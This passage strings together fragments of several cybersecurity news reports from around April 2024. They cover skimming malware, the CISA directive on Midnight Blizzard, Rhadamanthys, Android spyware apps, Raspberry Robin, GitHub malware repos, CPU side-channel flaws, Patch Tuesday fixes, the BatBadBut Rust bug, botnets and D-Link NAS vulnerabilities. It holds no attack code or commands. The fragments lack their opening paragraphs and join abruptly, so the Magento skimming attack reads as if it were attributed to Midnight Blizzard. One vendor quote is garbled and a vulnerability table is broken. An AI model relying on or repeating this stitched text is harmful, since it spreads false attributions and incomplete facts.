and Magento are the target of another malware called Magento Shoplift. Earlier
variants of Magento Shoplift have been detected in the wild since September
2023.
The attack chain starts with injecting an obfuscated JavaScript snippet into a
legitimate JavScript file that's responsible for loading a second script from
jqueurystatics[.]com via WebSocket Secure (WSS), which, in turn, is designed to
facilitate credit card skimming and data theft while masquerading as a Google
Analytics script.
"WordPress has become a massive player in e-commerce as well, thanks to the
adoption of Woocommerce and other plugins that can easily turn a WordPress site
into a fully-featured online store," researcher Puja Srivastava said.
"This popularity also makes WordPress stores a prime target — and attackers are
modifying their MageCart e-commerce malware to target a wider range of CMS
platforms."
The attack, which came to light earlier this year, has been attributed to a
Russian nation-state group tracked as Midnight Blizzard (aka APT29 or Cozy
Bear). Last month, Microsoft revealed that the adversary managed to access some
of its source code repositories but noted that there is no evidence of a breach
of customer-facing systems.
The emergency directive, which was originally issued privately to federal
agencies on April 2, was first reported on by CyberScoop two days later.
"The threat actor is using information initially exfiltrated from the corporate
email systems, including authentication details shared between Microsoft
customers and Microsoft by email, to gain, or attempt to gain, additional access
to Microsoft customer systems," CISA said.
The agency said the theft of email correspondence between government entities
and Microsoft poses severe risks, urging concerned parties to analyze the
content of exfiltrated emails, reset compromised credentials, and take
additional steps to ensure authentication tools for privileged Microsoft Azure
accounts are secure.
It's currently not clear how many federal agencies have had their email
exchanges exfiltrated in the wake of the incident, although CISA said all of
them have been notified.
The agency is also urging affected entities to perform a cybersecurity impact
analysis by April 30, 2024, and provide a status update by May 1, 2024, 11:59
p.m. Other organizations that are impacted by the breach are advised to contact
their respective Microsoft account team for any additional questions or follow
up.
"Regardless of direct impact, all organizations are strongly encouraged to apply
stringent security measures, including strong passwords, multi-factor
authentication (MFA) and prohibited sharing of unprotected sensitive information
via unsecure channels," CISA said.
The development comes as CISA released a new version of its malware analysis
system, called Malware Next-Gen, that allows organizations to submit malware
samples (anonymously or otherwise) and other suspicious artifacts for analysis.
"This is the first time researchers observed TA547 use Rhadamanthys, an
information stealer that is used by multiple cybercriminal threat actors,"
Proofpoint said. "Additionally, the actor appeared to use a PowerShell script
that researchers suspect was generated by a large language model (LLM)."
TA547 is a prolific, financially motivated threat actor that's known to be
active since at least November 2017, using email phishing lures to deliver a
variety of Android and Windows malware such as ZLoader, Gootkit, DanaBot,
Ursnif, and even Adhubllka ransomware.
In recent years, the group has evolved into an initial access broker (IAB) for
ransomware attacks. It has also been observed employing geofencing tricks to
restrict payloads to specific regions.
The email messages observed as part of the latest campaign impersonate the
German company Metro AG and contain a password-protected ZIP file containing a
ZIP archive that, when opened, initiates the execution of a remote PowerShell
script to launch the Rhadamanthys stealer directly in memory.
Interestingly, the PowerShell script used to load Rhadamanthys includes
"grammatically correct and hyper specific comments" for each instruction in the
program, raising the possibility that it may have been generated (or rewritten)
using an LLM.
The alternate hypothesis is that TA547 copied the script from another source
that had used generative AI technology to create it.
"This campaign represents an example of some technique shifts from TA547
including the use of compressed LNKs and previously unobserved Rhadamanthys
stealer," Proofpoint said. "It also provides insight into how threat actors are
leveraging likely LLM-generated content in malware campaigns."
The development comes as phishing campaigns have also been banking on uncommon
tactics to facilitate credential-harvesting attacks. In these emails, recipients
are notified of a voice message and are directed to click on a link to access
it.
The payload retrieved from the URL is heavily obfuscated HTML content that runs
JavaScript code embedded within an SVG image when the page is rendered on the
target system.
Present within the SVG data is "encrypted data containing a second stage page
prompting the target to enter their credentials to access the voice message,"
Binary Defense said, adding the page is encrypted using CryptoJS.
Other email-based attacks have paved the way for Agent Tesla, which has emerged
as an attractive option for threat actors due to it "being an affordable malware
service with multiple capabilities to exfiltrate and steal users' data,"
according to Cofense.
Social engineering campaigns have also taken the form of malicious ads served on
search engines like Google that lure unsuspecting users into downloading bogus
installers for popular software like PuTTY, FileZilla, and Room Planner to
ultimately deploy Nitrogen and IDAT Loader.
The infection chain associated with IDAT Loader is noteworthy for the fact that
the MSIX installer is used to launch a PowerShell script that, in turn, contacts
a Telegram bot to fetch a second PowerShell script hosted on the bot.
This PowerShell script then acts as a conduit to deliver another PowerShell
script that's used to bypass Windows Antimalware Scan Interface (AMSI)
protections as well as trigger the execution of the loader, which subsequently
proceeds to load the SectopRAT trojan.
"Endpoints can be protected from malicious ads via group policies that restrict
traffic coming from the main and lesser known ad networks," Jérôme Segura,
principal threat researcher at Malwarebytes, said.
It also specifically called out companies like NSO Group for developing
commercial surveillance tools such as Pegasus that are used by state actors to
pull off "individually targeted attacks of such exceptional cost and
complexity."
"Though deployed against a very small number of individuals — often journalists,
activists, politicians, and diplomats — mercenary spyware attacks are ongoing
and global," Apple said.
"The extreme cost, sophistication, and worldwide nature of mercenary spyware
attacks makes them some of the most advanced digital threats in existence
today."
The update marks a change in wording that previously said these "threat
notifications" are designed to inform and assist users who may have been
targeted by state-sponsored attackers.
According to TechCrunch, Apple is said to have sent threat notifications to
iPhone users in 92 countries at 12:00 p.m. PST on Wednesday coinciding with the
revision to the support page.
It's worth noting that Apple began sending threat notifications to warn users it
believes have been targeted by state-sponsored attackers starting November 2021.
However, the company also makes it a point to emphasize that it does not
"attribute the attacks or resulting threat notifications" to any particular
threat actor or geographical region.
The development comes amid continued efforts by governments around the world to
counter the misuse and proliferation of commercial spyware.
Last month, the U.S. government said Finland, Germany, Ireland, Japan, Poland,
and South Korea had joined an inaugural group of 11 countries working to develop
safeguards against the abuse of invasive surveillance technology.
"Commercial spyware has been misused across the world by authoritarian regimes
and in democracies [...] without proper legal authorization, safeguards, or
oversight," the governments said in a joint statement.
"The misuse of these tools presents significant and growing risks to our
national security, including to the safety and security of our government
personnel, information, and information systems."
According to a recent report published by Google's Threat Analysis Group (TAG)
and Mandiant, commercial surveillance vendors were behind the in-the-wild
exploitation of a chunk of the 97 zero-day vulnerabilities discovered in 2023.
All the vulnerabilities attributed to spyware companies targeted web browsers –
particularly flaws in third-party libraries that affect more than one browser
and substantially increase the attack surface – and mobile devices running
Android and iOS.
"Private sector firms have been involved in discovering and selling exploits for
many years, but we have observed a notable increase in exploitation driven by
these actors over the past several years," the tech giant said.
"Threat actors are increasingly leveraging zero-days, often for the purposes of
evasion and persistence, and we don't expect this activity to decrease anytime
soon."
Google also said that increased security investments into exploit mitigations
are affecting the types of vulnerabilities threat actors can weaponize in their
attacks, forcing them to bypass several security guardrails (e.g., Lockdown Mode
and MiraclePtr) to infiltrate target devices.
Tracked as CVE-2023-45590, the vulnerability carries a CVSS score of 9.4 out of
a maximum of 10.
"An Improper Control of Generation of Code ('Code Injection') vulnerability
[CWE-94] in FortiClientLinux may allow an unauthenticated attacker to execute
arbitrary code via tricking a FortiClientLinux user into visiting a malicious
website," Fortinet said in an advisory.
The shortcoming, which has been described as a case of remote code execution due
to a "dangerous nodejs configuration," impacts the following versions -
FortiClientLinux versions 7.0.3 through 7.0.4 and 7.0.6 through 7.0.10 (Upgrade
to 7.0.11 or above) FortiClientLinux version 7.2.0 (Upgrade to 7.2.1 or
above) Security researcher CataLpa from Dbappsecurity has been credited with
discovering and reporting the vulnerability.
Fortinet's security patches for April 2024 also address an issue with
FortiClientMac installer that could also lead to code execution (CVE-2023-45588
and CVE-2024-31492, CVSS scores: 7.8).
Also resolved is a FortiOS and FortiProxy bug that could leak administrator
cookies in certain scenarios (CVE-2023-41677, CVSS score: 7.5).
While there is no evidence of any of the flaws being exploited in the wild, it's
recommended that users keep their systems up-to-date to mitigate potential
threats.
Slovak cybersecurity firm said the activity, ongoing since November 2021, is not
linked to any known threat actor or group. It's tracking the group behind the
operation under the name Virtual Invaders.
"Downloaded apps provide legitimate functionality, but also include code from
the open-source Android XploitSPY RAT," ESET security researcher Lukáš Štefanko
said in a technical report released today.
The campaign is said to be highly targeted in nature, with the apps available on
Google Play having negligible number of installs ranging from zero to 45. The
apps have since been taken down.
The fake-but-functional apps primarily masquerade as messaging services like
Alpha Chat, ChitChat, Defcom, Dink Messenger, Signal Lite, TalkU, WeTalk, Wicker
Messenger, and Zaangi Chat. Approximately 380 victims are said to have
downloaded the apps and created accounts to use them for messaging purposes.
Also employed as part of eXotic Visit are apps such as Sim Info and Telco DB,
both of which claim to provide details about SIM owners simply by entering a
Pakistan-based phone number. Other applications pass off as a food ordering
service in Pakistan as well as a legitimate Indian hospital called Specialist
Hospital (now rebranded as Trilife Hospital).
XploitSPY, uploaded to GitHub as early as April 2020 by a user named RaoMK, is
associated with an Indian cyber security solutions company called XploitWizer.
It has also been described as a fork of another open-source Android trojan
called L3MON, which, in turn, draws inspiration from AhMyth.
It comes with a wide gamut of features that allows it to gather sensitive data
from infected devices, such as GPS locations, microphone recordings, contacts,
SMS messages, call logs, and clipboard content; extract notification details
from apps like WhatsApp, Facebook, Instagram, and Gmail; download and upload
files; view installed apps; and queue commands.
On top of that, the malicious apps are designed to take pictures and enumerate
files in several directories related to screenshots, WhatApp, WhatsApp Business,
Telegram, and an unofficial WhatsApp mod known as GBWhatsApp.
"Throughout the years, these threat actors have customized their malicious code
by adding obfuscation, emulator detection, hiding of [command-and-control]
addresses, and use of a native library," Štefanko said.
The main purpose of the native library ("defcome-lib.so") is to keep the C2
server information encoded and hidden from static analysis tools. If an emulator
is detected, the app makes use of a fake C2 server to evade detection.
Some of the apps have been propagated through websites specifically created for
this purpose ("chitchat.ngrok[.]io") that provide a link to an Android package
file ("ChitChat.apk") hosted on GitHub. It's presently not clear how victims are
directed to these apps.
"Distribution started on dedicated websites and then even moved to the official
Google Play store," Štefanko concluded. "The purpose of the campaign is
espionage and probably is targeting victims in Pakistan and India."
"Historically, Raspberry Robin was known to spread through removable media like
USB drives, but over time its distributors have experimented with other initial
infection vectors," HP Wolf Security researcher Patrick Schläpfer said in a
report shared with The Hacker News.
Raspberry Robin, also called QNAP worm, was first spotted in September 2021 that
has since evolved into a downloader for various other payloads in recent years,
such as SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, and also
serving as a precursor for ransomware.
While the malware was initially distributed by means of USB devices containing
LNK files that retrieved the payload from a compromised QNAP device, it has
since adopted other methods such as social engineering and malvertising.
It's attributed to an emerging threat cluster tracked by Microsoft as
Storm-0856, which has links to the broader cybercrime ecosystem comprising
groups like Evil Corp, Silence, and TA505.
The latest distribution vector entails the use of WSF files that are offered for
download via various domains and subdomains.
It's currently not clear how the attackers are directing victims to these URLs,
although it's suspected that it could be either via spam or malvertising
campaigns.
The heavily obfuscated WSF file functions as a downloader to retrieve the main
DLL payload from a remote server using the curl command, but not before a series
of anti-analysis and anti-virtual machine evaluations are carried out to
determine if it's being run in a virtualized environment.
It's also designed to terminate the execution if the build number of the Windows
operating system is lower than 17063 (which was released in December 2017) and
if the list of running processes includes antivirus processes associated with
Avast, Avira, Bitdefender, Check Point, ESET, and Kaspersky.
What's more, it configures Microsoft Defender Antivirus exclusion rules in an
effort to sidestep detection by adding the entire main drive to the exclusion
list and preventing it from being scanned.
"The scripts itself are currently not classified as malicious by any an-virus
scanners on VirusTotal, demonstrating the evasiveness of the malware and the
risk of it causing a serious infection with Raspberry Robin," HP said.
"The WSF downloader is heavily obfuscated and uses many an-analysis techniques
enabling the malware to evade detection and slow down analysis."
Threat actors are now taking advantage of GitHub's search functionality to trick
unsuspecting users looking for popular repositories into downloading spurious
counterparts that serve malware.
The latest assault on the open-source software supply chain involves concealing
malicious code within Microsoft Visual Code project files that's designed to
download next-stage payloads from a remote URL, Checkmarx said in a report
shared with The Hacker News.
"Attackers create malicious repositories with popular names and topics, using
techniques like automated updates and fake stars to boost search rankings and
deceive users," security researcher Yehuda Gelb said.
The idea is to manipulate the search rankings in GitHub to bring threat
actor-controlled repositories to the top when users filter and sort their
results based on the most recent updates and increase the popularity via bogus
stars added via fake accounts.
In doing so, the attack lends a veneer of legitimacy and trust to the fraudulent
repositories, effectively deceiving developers into downloading them.
"In contrast to past incidents where attackers were found to add hundreds or
thousands of stars to their repos, it appears that in these cases, the attackers
opted for a more modest number of stars, probably to avoid raising suspicion
with an exaggerated number," Gelb said.
It's worth pointing out that previous research from Checkmarx late last year
uncovered a black market comprising online stores and chat groups that are
selling GitHub stars to artificially boost a repository's popularity, a
technique referred to as star inflation.
What's more, a majority of these repositories are disguised as legitimate
projects related to popular games, cheats, and tools, adding another layer of
sophistication to make it harder to distinguish them from benign code.
Some repositories have been observed downloading an encrypted .7z file
containing an executable named "feedbackAPI.exe" that has been inflated to 750
MB in a likely attempt to evade antivirus scanning and ultimately launch malware
that shares similarities with Keyzetsu clipper.
The Windows malware, which came to light early last year, is often distributed
through pirated software such as Evernote. It's capable of diverting
cryptocurrency transactions to attacker-owned wallets by substituting the wallet
address copied in the clipboard.
The findings underscore the due diligence that developers must follow when
downloading source code from open-source repositories, not to mention the
dangers of solely relying on reputation as a metric to evaluate trustworthiness.
"The use of malicious GitHub repositories to distribute malware is an ongoing
trend that poses a significant threat to the open-source ecosystem," Gelb said.
"By exploiting GitHub's search functionality and manipulating repository
properties, attackers can lure unsuspecting users into downloading and executing
malicious code."
The development comes as Phylum said it discovered an uptick in the number of
spam (i.e., non-malicious) packages being published to the npm registry by a
user named ylmin to orchestrate a "massive automated crypto farming campaign"
that abuses the Tea protocol.
"The Tea protocol is a web3 platform whose stated goal is compensating open
source package maintainers, but instead of cash rewards, they are rewarded with
TEA tokens, a cryptocurrency," the company's research team said.
"The Tea protocol is not even live yet. These users are farming points from the
'Incentivized Testnet,' apparently with the expectation that having more points
in the Testnet will increase their odds of receiving a later airdrop."
The exploit, called Native Branch History Injection (BHI), can be used to leak
arbitrary kernel memory at 3.5 kB/sec by bypassing existing Spectre v2/BHI
mitigations, researchers from Systems and Network Security Group (VUSec) at
Vrije Universiteit Amsterdam said in a new study.
The shortcoming is being tracked as CVE-2024-2201.
BHI was first disclosed by VUSec in March 2022, describing it as a technique
that can get around Spectre v2 protections in modern processors from Intel, AMD,
and Arm.
While the attack leveraged extended Berkeley Packet Filters (eBPFs), Intel's
recommendations to address the problem, among other things, was to disable
Linux's unprivileged eBPFs.
"Privileged managed runtimes that can be configured to allow an unprivileged
user to generate and execute code in a privileged domain -- such as Linux's
'unprivileged eBPF' -- significantly increase the risk of transient execution
attacks, even when defenses against intra-mode [Branch Target Injection] are
present," Intel said at the time.
"The kernel can be configured to deny access to unprivileged eBPF by default,
while still allowing administrators to enable it at runtime where needed."
Native BHI neutralizes this countermeasure by showing that BHI is possible
without eBPF. It impacts all Intel systems that are susceptible to BHI.
As a result, it makes it possible for an attacker with access to CPU resources
to influence speculative execution paths via malicious software installed on a
machine with the goal of extracting sensitive data that are associated with a
different process.
"Existing mitigation techniques of disabling privileged eBPF and enabling
(Fine)IBT are insufficient in stopping BHI exploitation against the
kernel/hypervisor," the CERT Coordination Center (CERT/CC) said in an advisory.
"An unauthenticated attacker can exploit this vulnerability to leak privileged
memory from the CPU by speculatively jumping to a chosen gadget."
The flaw has been confirmed to affect Illumos, Intel, Red Hat, SUSE Linux,
Triton Data Center, and Xen. AMD, in a bulletin, said it's "aware of any impact"
on its products.
The disclosure comes weeks after IBM and VUSec detailed GhostRace
(CVE-2024-2193), a variant of Spectre v1 that employs a combination of
speculative execution and race conditions to leak data from contemporary CPU
architectures.
It also follows new research from ETH Zurich that disclosed a family of attacks
dubbed Ahoi Attacks that could be used to compromise hardware-based trusted
execution environments (TEEs) and break confidential virtual machines (CVMs)
like AMD Secure Encrypted Virtualization-Secure Nested Paging (SEV-SNP) and
Intel Trust Domain Extensions (TDX).
The attacks, codenamed Heckler and WeSee, make use of malicious interrupts to
break the integrity of CVMs, potentially allowing threat actors to remotely log
in and gain elevated access, as well as perform arbitrary read, write, and code
injection to disable firewall rules and open a root shell.
"For Ahoi Attacks, an attacker can use the hypervisor to inject malicious
interrupts to the victim's vCPUs and trick it into executing the interrupt
handlers," the researchers said. "These interrupt handlers can have global
effects (e.g., changing the register state in the application) that an attacker
can trigger to compromise the victim's CVM."
In response to the findings, AMD said the vulnerability is rooted in the Linux
kernel implementation of SEV-SNP and that fixes addressing some of the issues
have been upstreamed to the main Linux kernel.
Of the 149 flaws, three are rated Critical, 142 are rated Important, three are
rated Moderate, and one is rated Low in severity. The update is aside from 21
vulnerabilities that the company addressed in its Chromium-based Edge browser
following the release of the March 2024 Patch Tuesday fixes.
The two shortcomings that have come under active exploitation are below -
CVE-2024-26234 (CVSS score: 6.7) - Proxy Driver Spoofing Vulnerability
CVE-2024-29988 (CVSS score: 8.8) - SmartScreen Prompt Security Feature Bypass
Vulnerability While Microsoft's own advisory provides no information about
CVE-2024-26234, cybersecurity firm Sophos said it discovered in December 2023 a
malicious executable ("Catalog.exe" or "Catalog Authentication Client Service")
that's signed by a valid Microsoft Windows Hardware Compatibility Publisher
(WHCP) certificate.
Authenticode analysis of the binary has revealed the original requesting
publisher to Hainan YouHu Technology Co. Ltd, which is also the publisher of
another tool called LaiXi Android Screen Mirroring.
The latter is described as "a marketing software ... [that] can connect hundreds
of mobile phones and control them in batches, and automate tasks like batch
following, liking, and commenting."
Present within the purported authentication service is a component called 3proxy
that's designed to monitor and intercept network traffic on an infected system,
effectively acting as a backdoor.
"We have no evidence to suggest that the LaiXi developers deliberately embedded
the malicious file into their product, or that a threat actor conducted a supply
chain attack to insert it into the compilation/building process of the LaiXi
application," Sophos researcher Andreas Klopsch said.
The cybersecurity company also said it discovered multiple other variants of the
backdoor in the wild going all the way back to January 5, 2023, indicating that
the campaign has been underway at least since then. Microsoft has since added
the relevant files to its revocation list.
The other security flaw that has reportedly come under active attack is
CVE-2024-29988, which – like CVE-2024-21412 and CVE-2023-36025 – allows
attackers to sidestep Microsoft Defender Smartscreen protections when opening a
specially crafted file.
"To exploit this security feature bypass vulnerability, an attacker would need
to convince a user to launch malicious files using a launcher application that
requests that no UI be shown," Microsoft said.
"In an email or instant message attack scenario, the attacker could send the
targeted user a specially crafted file that is designed to exploit the remote
code execution vulnerability."
The Zero Day Initiative revealed that there is evidence of the flaw being
exploited in the wild, although Microsoft has tagged it with an "Exploitation
More Likely" assessment.
Another vulnerability of importance is CVE-2024-29990 (CVSS score: 9.0), an
elevation of privilege flaw impacting Microsoft Azure Kubernetes Service
Confidential Container that could be exploited by unauthenticated attackers to
steal credentials.
"An attacker can access the untrusted AKS Kubernetes node and AKS Confidential
Container to take over confidential guests and containers beyond the network
stack it might be bound to," Redmond said.
In all, the release is notable for addressing as many as 68 remote code
execution, 31 privilege escalation, 26 security feature bypass, and six
denial-of-service (DoS) bugs. Interestingly, 24 of the 26 security bypass flaws
are related to Secure Boot.
"While none of these Secure Boot vulnerabilities addressed this month were
exploited in the wild, they serve as a reminder that flaws in Secure Boot
persist, and we could see more malicious activity related to Secure Boot in the
future," Satnam Narang, senior staff research engineer at Tenable, said in a
statement.
The disclosure comes as Microsoft has faced criticism for its security
practices, with a recent report from the U.S. Cyber Safety Review Board (CSRB)
calling out the company for not doing enough to prevent a cyber espionage
campaign orchestrated by a Chinese threat actor tracked as Storm-0558 last year.
It also follows the company's decision to publish root cause data for security
flaws using the Common Weakness Enumeration (CWE) industry standard. However,
it's worth noting that the changes are only in effect starting from advisories
published since March 2024.
"The addition of CWE assessments to Microsoft security advisories helps pinpoint
the generic root cause of a vulnerability," Adam Barnett, lead software engineer
at Rapid7, said in a statement shared with The Hacker News.
"The CWE program has recently updated its guidance on mapping CVEs to a CWE Root
Cause. Analysis of CWE trends can help developers reduce future occurrences
through improved Software Development Life Cycle (SDLC) workflows and testing,
as well as helping defenders understand where to direct defense-in-depth and
deployment-hardening efforts for best return on investment."
In a related development, cybersecurity firm Varonis detailed two methods that
attackers could adopt to circumvent audit logs and avoid triggering download
events while exfiltrating files from SharePoint.
The first approach takes advantage of SharePoint's "Open in App" feature to
access and download files, whereas the second uses the User-Agent for Microsoft
SkyDriveSync to download files or even entire sites while miscategorizing such
events as file syncs instead of downloads.
Microsoft, which was made aware of the issues in November 2023, has yet to
release a fix, although they have been added to their patch backlog program. In
the interim, organizations are recommended to closely monitor their audit logs
for suspicious access events, specifically those that involve large volumes of
file downloads within a short period.
"These techniques can bypass the detection and enforcement policies of
traditional tools, such as cloud access security brokers, data loss prevention,
and SIEMs, by hiding downloads as less suspicious access and sync events," Eric
Saraga said.
The vulnerability, tracked as CVE-2024-24576, has a CVSS score of 10.0,
indicating maximum severity. That said, it only impacts scenarios where batch
files are invoked on Windows with untrusted arguments.
"The Rust standard library did not properly escape arguments when invoking batch
files (with the bat and cmd extensions) on Windows using the Command API," the
Rust Security Response working group said in an advisory released on April 9,
2024.
"An attacker able to control the arguments passed to the spawned process could
execute arbitrary shell commands by bypassing the escaping."
The flaw impacts all versions of Rust before 1.77.2. Security researcher RyotaK
has been credited with discovering and reporting the bug to the CERT
Coordination Center (CERT/CC).
RyotaK said the vulnerability – codenamed BatBadBut – impacts several
programming languages and that it arises when the "programming language wraps
the CreateProcess function [in Windows] and adds the escaping mechanism for the
command arguments."
But in light of the fact that not every programming language has addressed the
problem, developers are being recommended to exercise caution when executing
commands on Windows.
"To prevent the unexpected execution of batch files, you should consider moving
the batch files to a directory that is not included in the PATH environment
variable," RyotaK said in a word of advice to users.
"In this case, the batch files won't be executed unless the full path is
specified, so the unexpected execution of batch files can be prevented."
This update covers a total of 157 vulnerabilities. Seven of these
vulnerabilities are Chromium vulnerabilities affecting Microsoft's Edge
browser. However, only three of these vulnerabilities are considered
critical. One of the vulnerabilities had already been disclosed and
exploited.
Vulnerabilities of Interest:
CVE-2024-26234: This proxy driver spoofing vulnerability has already been
exploited and made public before today.
CVE-2024-21322, CVE-2024-21323, CVE-2024-29053: These critical
vulnerabilities allow remote code execution in Microsoft Defender for IoT.
The update patches about 40 (sorry, lost exact count) remote code execution
vulnerabilities in Microsoft OLE Driver for SQL Server. These
vulnerabilities are rated only "important", not "critical". The
vulnerability affects clients connecting to malicious SQL servers. The
client would be the target, not the server.
The seven important remote code execution vulnerabilities in the DNS Server
Service look interesting. To achieve remote code execution, "perfect timing"
is required according to Microsoft.
Description
CVE
Disclosed
Exploited
Exploitability (old versions)
current
version
Severity
CVSS Base (AVG)
CVSS Temporal (AVG)
Mariner: Openwsman Path Traversal and process_connection() DoS
vulnerability.
A threat group of suspected Romanian origin called RUBYCARP has been observed
maintaining a long-running botnet for carrying out crypto mining, distributed
denial-of-service (DDoS), and phishing attacks.
The group, believed to be active for at least 10 years, employs the botnet for
financial gain, Sysdig said in a report shared with The Hacker News.
"Its primary method of operation leverages a botnet deployed using a variety of
public exploits and brute-force attacks," the cloud security firm said. "This
group communicates via public and private IRC networks."
Evidence gathered so far suggests that RUBYCARP may have crossover with another
threat cluster tracked by Albanian cybersecurity firm Alphatechs under the
moniker Outlaw, which has a history of conducting crypto mining and brute-force
attacks and has since pivoted to phishing and spear-phishing campaigns to cast a
wide net.
"These phishing emails often lure victims into revealing sensitive information,
such as login credentials or financial details," security researcher Brenton
Isufi said in a report published in late December 2023.
A notable aspect of RUBYCARP's tradecraft is the use of a malware called
ShellBot (aka PerlBot) to breach target environments. It has also been observed
exploiting security flaws in the Laravel Framework (e.g., CVE-2021-3129), a
technique also adopted by other threat actors like AndroxGh0st.
In a sign that the attackers are expanding their arsenal of initial access
methods to expand the scale of the botnet, Sysdig said it discovered signs of
WordPress sites being compromised using commonly used usernames and passwords.
"Once access is obtained, a backdoor is installed based on the popular Perl
ShellBot," the company said. "The victim's server is then connected to an
[Internet Relay Chat] server acting as command-and-control, and joins the larger
botnet."
The botnet is estimated to comprise over 600 hosts, with the IRC server
("chat.juicessh[.]pro") created on May 1, 2023. It heavily relies on IRC for
general communications as well as for managing its botnets and coordinating
crypto mining campaigns.
Furthermore, members of the group – named juice_, Eugen, Catalin, MUIE, and
Smecher, among others – have been found to communicate via an Undernet IRC
channel called #cristi. Also put to use is a mass scanner tool to find new
potential hosts.
RUBYCARP's arrival on the cyber threat scene is not surprising given their
ability to take advantage of the botnet to fuel diverse illicit income streams
such as crypto mining and phishing operations to steal credit card numbers.
While it appears that the stolen credit card data is used to purchase attack
infrastructure, there is also the possibility that the information could be
monetized through other means by selling it in the cyber crime underground.
"These threat actors are also involved in the development and sale of cyber
weapons, which isn't very common," Sysdig said. "They have a large arsenal of
tools they have built up over the years, which gives them quite a range of
flexibility when conducting their operations.
Cisco Talos is tracking the activity cluster under the name Starry Addax,
describing it as primarily singling out activists associated with the Sahrawi
Arab Democratic Republic (SADR).
Starry Addax's infrastructure – ondroid[.]site and ondroid[.]store – is designed
to target both Android and Windows users, with the latter involving fake
websites masquerading as login pages for popular social media websites.
The adversary, believed to be active since January 2024, is known to send
spear-phishing emails to targets, urging recipients to install Sahara Press
Service's mobile app or a relevant decoy related to the region.
Depending on the operating system from where the request is originating from,
the target is either served a malicious APK that impersonates the Sahara Press
Service or redirected to a social media login page to harvest their credentials.
The novel Android malware, dubbed FlexStarling, is versatile and equipped to
deliver additional malware components and steal sensitive information from
infected devices.
Once installed, it requests the victim to grant it extensive permissions that
allow the malware to perform nefarious actions, including fetching commands to
be executed from a Firebase-based command-and-control (C2), a sign that the
threat actor is looking to fly under the radar.
"Campaigns like this that target high-value individuals usually intend to sit
quietly on the device for an extended period," Talos said.
"All components from the malware to the operating infrastructure seem to be
bespoke/custom-made for this specific campaign indicating a heavy focus on
stealth and conducting activities under the radar."
The development comes amid the emergence of a new commercial Android remote
access trojan (RAT) known as Oxycorat that's being offered for sale with diverse
information gathering capabilities.
The findings come from Romanian cybersecurity firm Bitdefender, which discovered
and reported the flaws in November 2023. The issues were fixed by LG as part of
updates released on March 22, 2024.
The vulnerabilities are tracked from CVE-2023-6317 through CVE-2023-6320 and
impact the following versions of webOS -
webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA webOS 5.5.0 - 04.50.51 running
on OLED55CXPUA webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on
OLED48C1PUB webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA
A brief description of the shortcomings is as follows -
CVE-2023-6317 - A vulnerability that allows an attacker to bypass PIN
verification and add a privileged user profile to the TV set without requiring
user interaction CVE-2023-6318 - A vulnerability that allows the attacker to
elevate their privileges and gain root access to take control of the device
CVE-2023-6319 - A vulnerability that allows operating system command injection
by manipulating a library named asm responsible for showing music lyrics
CVE-2023-6320 - A vulnerability that allows for the injection of authenticated
commands by manipulating the
com.webos.service.connectionmanager/tv/setVlanStaticAddress API endpoint
Successful exploitation of the flaws could allow a threat actor to gain elevated
permissions to the device, which, in turn, can be chained with CVE-2023-6318 and
CVE-2023-6319 to obtain root access, or with CVE-2023-6320 to run arbitrary
commands as the dbus user.
"Although the vulnerable service is intended for LAN access only, Shodan, the
search engine for Internet-connected devices, identified over 91,000 devices
that expose this service to the Internet," Bitdefender said. A majority of the
devices are located in South Korea, Hong Kong, the U.S., Sweden, Finland, and
Latvia.
The email messages come with Scalable Vector Graphics (SVG) file attachments
that, when clicked, activate the infection sequence, Fortinet FortiGuard Labs
said in a technical report.
The modus operandi is notable for the use of the BatCloak malware obfuscation
engine and ScrubCrypt to deliver the malware in the form of obfuscated batch
scripts.
BatCloak, offered for sale to other threat actors since late 2022, has its
foundations in another tool called Jlaive. Its primary feature is to load a
next-stage payload in a manner that circumvents traditional detection
mechanisms.
ScrubCrypt, a crypter that was first documented by Fortinet in March 2023 in
connection with a cryptojacking campaign orchestrated by the 8220 Gang, is
assessed to be one of the iterations of BatCloak, according to research from
Trend Micro last year.
In the latest campaign analyzed by the cybersecurity firm, the SVG file serves
as a conduit to drop a ZIP archive that contains a batch script likely created
using BatCloak, which then unpacks the ScrubCrypt batch file to ultimately
execute Venom RAT, but not before setting up persistence on the host and taking
steps to bypass AMSI and ETW protections.
A fork of Quasar RAT, Venom RAT allows attackers to seize control of the
compromised systems, gather sensitive information, and execute commands received
from a command-and-control (C2) server.
"While Venom RAT's primary program may appear straightforward, it maintains
communication channels with the C2 server to acquire additional plugins for
various activities," security researcher Cara Lin said. This includes Venom RAT
v6.0.3 with keylogger capabilities, NanoCore RAT, XWorm, and Remcos RAT.
"This [Remcos RAT] plugin was distributed from VenomRAT's C2 using three
methods: an obfuscated VBS script named 'remcos.vbs,' ScrubCrypt, and Guloader
PowerShell," Lin added.
Also delivered using the plugin system is a stealer that gathers information
about the system and exfiltrates data from folders associated with wallets and
applications like Atomic Wallet, Electrum, Ethereum, Exodus, Jaxx Liberty
(retired as of March 2023), Zcash, Foxmail, and Telegram to a remote server.
"This analysis reveals a sophisticated attack leveraging multiple layers of
obfuscation and evasion techniques to distribute and execute VenomRAT via
ScrubCrypt," Lin said.
"The attackers employ a variety of methods, including phishing emails with
malicious attachments, obfuscated script files, and Guloader PowerShell, to
infiltrate and compromise victim systems. Furthermore, deploying plugins through
different payloads highlights the versatility and adaptability of the attack
campaign."
Tracked as CVE-2024-3272 (CVSS score: 9.8) and CVE-2024-3273 (CVSS score: 7.3),
the vulnerabilities impact legacy D-Link products that have reached end-of-life
(EoL) status. D-Link, in an advisory, said it does not plan to ship a patch and
instead urges customers to replace them.
"The vulnerability lies within the nas_sharing.cgi uri, which is vulnerable due
to two main issues: a backdoor facilitated by hard-coded credentials, and a
command injection vulnerability via the system parameter," security researcher
who goes by the name netsecfish said in late March 2024.
Successful exploitation of the flaws could lead to arbitrary command execution
on the affected D-Link NAS devices, granting threat actors the ability to access
sensitive information, alter system configurations, or even trigger a
denial-of-service (DoS) condition.
The issues affect the following models -
DNS-320L DNS-325 DNS-327L, and DNS-340L Threat intelligence firm
GreyNoise said it observed attackers attempting to weaponize the flaws to
deliver the Mirai botnet malware, thus making it possible to remotely commandeer
the D-Link devices.
In the absence of a fix, the Shadowserver Foundation is recommending that users
either take these devices offline or have remote access to the appliance
firewalled to mitigate potential threats.
The findings once again illustrate that Mirai botnets are continuously adapting
and incorporating new vulnerabilities into their repertoire, with threat actors
